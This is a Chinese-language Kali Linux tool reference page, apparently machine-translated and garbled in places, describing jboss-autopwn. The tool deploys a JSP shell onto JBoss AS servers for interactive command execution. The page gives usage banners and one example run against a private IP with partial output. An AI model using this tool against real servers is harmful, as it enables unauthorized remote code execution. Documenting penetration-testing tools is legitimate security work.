的jboss-autopwn包装说明

这JBoss的脚本部署一个JSP壳目标的JBoss AS服务器上。一旦部署完成,该脚本用自己的上传和命令执行能力提供一个交互式会话。 其特点包括:

的jboss-autopwn首页 | 卡利的jboss-autopwn回购

  • 作者:基督教G. Papathanasiou,Trustwave控股公司
  • 许可:GPL第二版

    0x01 包含在jboss-autopwn封装工具

    JBoss的双赢 - 的JBoss的Windows autopwn
    :~# jboss-win
    [!] JBoss Windows autopwn
    [!] Usage: ./e2.sh server port
    [!] Christian Papathanasiou 
    [!] Trustwave SpiderLabs
    

    0x02 JBoss的Linux的 - JBoss的* nix的autopwn

    :~# jboss-linux
    [!] JBoss *nix autopwn
    [!] Usage: ./e.sh server port
    [!] Christian Papathanasiou
    [!] Trustwave SpiderLabs
    

    0x03 的jboss-autopwn用法示例

    攻击指定的端口 (8080) 上的目标服务器 (192.168.1.200), 重定向标准错误 (2>的/ dev / null的):
:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file:

原文来自https://www.hackfun.org/kali-tools/jboss-autopwn_zh.html。转载请注明原出处,商用请联系原作者授权。

results matching ""

    No results matching ""